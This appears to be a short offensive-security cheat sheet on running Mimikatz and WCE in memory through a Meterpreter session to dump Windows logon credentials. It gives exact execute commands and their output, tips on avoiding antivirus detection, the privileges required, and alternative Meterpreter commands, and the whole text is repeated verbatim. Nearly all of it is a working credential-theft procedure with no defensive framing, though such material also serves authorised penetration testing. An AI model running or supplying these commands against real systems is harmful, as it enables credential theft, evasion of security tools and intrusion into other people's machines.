run Mimikatz and WCE in memory meterpreter
IMPORTANT: you need to be SYSTEM and to migrate to a cool process in order to succeed
Mimikatz
execute -H -c -f /home/unknown/Tools/mimikatz_trunk/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit' -m
Or if you want to be detected by the antivirus ( no -m flag):
meterpreter > execute -H -i -c -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Process 4288 created.
Channel 3 created.
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Jul 4 2013 01:26:01) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # sekurlsa::logonPasswords full
Problem: How do I use a mimikatz dll without being detected by the AV?
Alternative:
meterpreter>load mimikatz
meterpreter>kerberos
meterpreter>wdigest
Similar thing for WCE
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
Inspired by:
http://justinelze.wordpress.com/2013/03/25/wce-and-mimikatz-in-memory-over-meterpreter/
http://www.room362.com/blog/2012/09/05/completely-in-memory-mimikatz-with-metasploit/
Mimikatz
execute -H -c -f /home/unknown/Tools/mimikatz_trunk/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit' -m
Or if you want to be detected by the antivirus ( no -m flag):
meterpreter > execute -H -i -c -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Process 4288 created.
Channel 3 created.
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Jul 4 2013 01:26:01) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # sekurlsa::logonPasswords full
Problem: How do I use a mimikatz dll without being detected by the AV?
Alternative:
meterpreter>load mimikatz
meterpreter>kerberos
meterpreter>wdigest
Similar thing for WCE
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
Inspired by:
http://justinelze.wordpress.com/2013/03/25/wce-and-mimikatz-in-memory-over-meterpreter/
http://www.room362.com/blog/2012/09/05/completely-in-memory-mimikatz-with-metasploit/